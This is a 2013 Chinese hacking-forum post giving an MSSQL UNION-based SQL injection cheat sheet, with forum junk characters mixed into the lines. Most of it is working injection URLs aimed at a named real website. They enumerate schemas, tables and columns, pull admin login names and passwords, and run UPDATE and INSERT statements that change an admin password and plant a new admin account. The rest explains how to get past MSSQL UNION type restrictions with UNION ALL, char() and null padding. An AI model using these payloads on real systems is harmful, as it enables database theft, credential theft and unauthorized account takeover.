中国网络渗透测试联盟

标题: MSSQL用union查询爆数据 [打印本页]

作者: admin    时间: 2013-4-4 17:54
标题: MSSQL用union查询爆数据
爆库: http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA.– SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA. 爆下一个库: http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE TABLE_NAME NOT IN (‘库名’)–
; s+ f% S+ C3 t; h/ C2 w5 l2 B5 V$ z. {- t  B! r
爆表: http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–
) G& P+ w2 u& s$ ]' K: wSELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES.
- H8 D  v' v' ~爆下一个表 http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (‘table1′)–% V  n5 X5 D0 {! d
http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%login%’–
2 j, d5 d% a7 Q2 Y7 ^( Y
/ N1 O8 w: d% K. X, f爆字段: http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’–3 Y/ X/ o5 O& d, D; r2 j
爆下一个字段 http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’)–
& p$ s9 H) X. e6 s( H6 o( phttp://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’,'login_name’,'password’,details’)–
1 G9 C3 ]+ X% k4 J爆字段里的内容 http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 login_name FROM admin_login–8 A2 C7 q' ?9 m0 t
http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’–) t6 n" Z0 P+ V
http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’–6 \, I5 B6 i! J) ]
http://www.myhack58.com/index.asp.id=10 UNION SELECT TOP 1 convert(int,password.morpheus.) FROM admin_login where login_name=’trinity’–
# f- a3 r& h9 q! o1 x' T更新字段里的内容 http://www.myhack58.com/index.asp.id=10; UPDATE .admin_login. SET .password. = .newpas5. WHERE login_name=’neo’–
4 Z8 a- P5 ~) Y" |  W: [8 s7 ghttp://www.myhack58.com/index.asp.id=10; INSERT INTO .admin_login. (.login_id.,.login_name.,.password.,.details.) VALUES (666,.neo2.,.newpas5.,.NA.)–
# u$ Z( q0 F" b  K, }
5 K6 R, e( L8 D- H6 {: `! u( A' m在注射的时候,access和mysql环境下,我们通常是通过union来获取数据的。但是遇到mssql环境,union很多时候都行不通,如果页面不报错,openrowset不可用,往往时候就只有暴力了。这样多不好,大家都是文明人,怎么可以用这么野蛮的手段呢?研究了一下,mssql中的union选择主要有以下几个方面的限制。     第一个是varchar/nvarchar和int类型的字段union到一起会强制转换出错。这个可以去看superhei大牛N久以前的文章,用and 1=2 把union前面的结果集置空就可以解决了。     第二个是当前面语句选择的字段有text、ntext 或者image格式的时候,不能用DISTINCT 方式来选择,而带union的语句必然是以DISTINCT 方式来选择的。这也是为什么很多搜索型的注射点可以用union猜解的原因,因为搜索点的语句很少会选到前面三种格式的字段。Image是二进制格式,一般不会出现在需要回显的sql语句中。这种限制前段时间也看到牛淫给出了解决方法,union后面跟一个all,即union all就搞定了。真是神奇啊,牛淫就是牛淫。     最后还有一个限制是text/ntext 与 int类型的字段 union到一起时并不兼容,会报操作数类型冲突的错误,就算用1=2把union前面语句的结果置空也一样。前几天突然想到,union的时候我们经常用1,2,3……之类的常数来补齐相差的列数。这时候后面的语句选择的都是int类型的字段,遇到前面有text/ntext的字段当然会出错,如果加上引号呢,即’1’,’2’,’3’……的形式?这时候后面的字段都是char或者varchar的类型了,应该就不会出错了。如果注射点过滤了引号怎么办?因为mssql对16进制格式的支持不是太好,很多地方用16进制必须declare――set,那就用char吧,即and 1=2 union all select char(49),char(50)……的形式。+ |3 N' @# p6 T4 k
突了了大部份限制的语句 and 1=2 union all select char(49),char(50),null,null;–
2 T9 h3 ]" {7 H! f8 ^, knull也可以正常执行,不过没有回显,不好判断回显的列数。 一般union遇到问题都是有text或者ntext字段,image的很少遇到  I. ^. @% M4 g  M2 |
可以先null完之后再一个个用1,2,3,4代替,这样就能逼出image类型的列鸟
& k# N) r7 n! }% T5 `& \




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2